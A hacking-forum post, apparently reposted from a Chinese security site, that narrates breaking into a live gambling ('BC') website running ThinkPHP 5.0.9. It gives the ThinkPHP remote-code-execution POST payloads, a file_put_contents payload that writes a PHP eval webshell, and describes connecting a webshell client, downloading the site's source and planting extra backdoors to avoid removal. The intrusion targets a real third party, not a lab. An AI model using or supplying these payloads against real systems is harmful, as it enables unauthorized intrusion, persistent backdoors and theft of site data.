Jump to content

Title: Simple BC site getshell

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

0x01 Determine the target

Main site:

1049983-20220106104330681-1405261208.png

Side by:

1049983-20220106104331327-1747311994.png

0x02 Vulnerability Exploit

Through information collection, it was found that it was tp v5.0.9, and this version has a tp-rce vulnerability.

1049983-20220106104331825-1027593284.png

Test directly through payload.

Post: _method=__constructfilter[]=assertmethod=getget[]=phpinfo()

Find payload and type directly:

Post: _method=__constructfilter[]=assertmethod=getget[]=phpinfo()

1049983-20220106104332260-1610753114.png

It was found that it is from php 5.4.45.

Try getshell directly:

1049983-20220106104332691-319550220.png

It is found that the system is disabled, and the same is true for trying other system commands.

1049983-20220106104333144-1922570488.png

Check out those functions that desable_functions in phpinfo are disabled.

1049983-20220106104333540-1301638445.png

Find a way to bypass and write horses (I've been stuck here for a long time)

Finally, through a penetration friend, I came up with the following one that can use file_put_contents to write the shell directly. After thinking for a long time, I forgot to use other functions to write the horse directly. I don’t have to use the system command to write the horse, but the underlying knowledge is still weak. Thank you again!

1049983-20220106104333995-1796623647.png

0x03 getshell

Construct payload:

_method=__constructfilter[]=assertmethod=getget[]=file_put_contents('a.php','?php eval($_POST[a])?')

1049983-20220106104334533-47908496.png

The writing is successful and connected with the kitchen knife.

1049983-20220106104334965-571720133.png

Connected successfully.

View permissions:

1049983-20220106104335330-28763533.png

Remote Security Mode was found to be activated.

If you want to bypass it, you find that many functions are disabled and the account is not successful.

Download source code:

1049983-20220106104335675-327281683.png

Deploy more backdoors to prevent deletion.

0x04 Summary

1. Open the BC website, and through the bottom version information, I found that the site framework is tp v5.0.9, and there is an RCE vulnerability

Post: _method=__constructfilter[]=assertmethod=getget[]=phpinfo()

2. It was found that it is in php 5.4.45 version. I directly tried to execute the commands and found that the system function and the functions that execute the system commands were also disabled.

Post: _method=__constructfilter[]=assertmethod=getget[]=whomai

3. Although the system command function is disabled, you can use file_put_contents to write shell directly to bypass it.

4. Get getshell

Construct the payload:

_method=__constructfilter[]=assertmethod=getget[]=file_put_contents('a.php','?php eval($_POST[a])?')

5. Write successfully, connect with kitchen knife

Source: https://xz.aliyun.com/t/9232

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.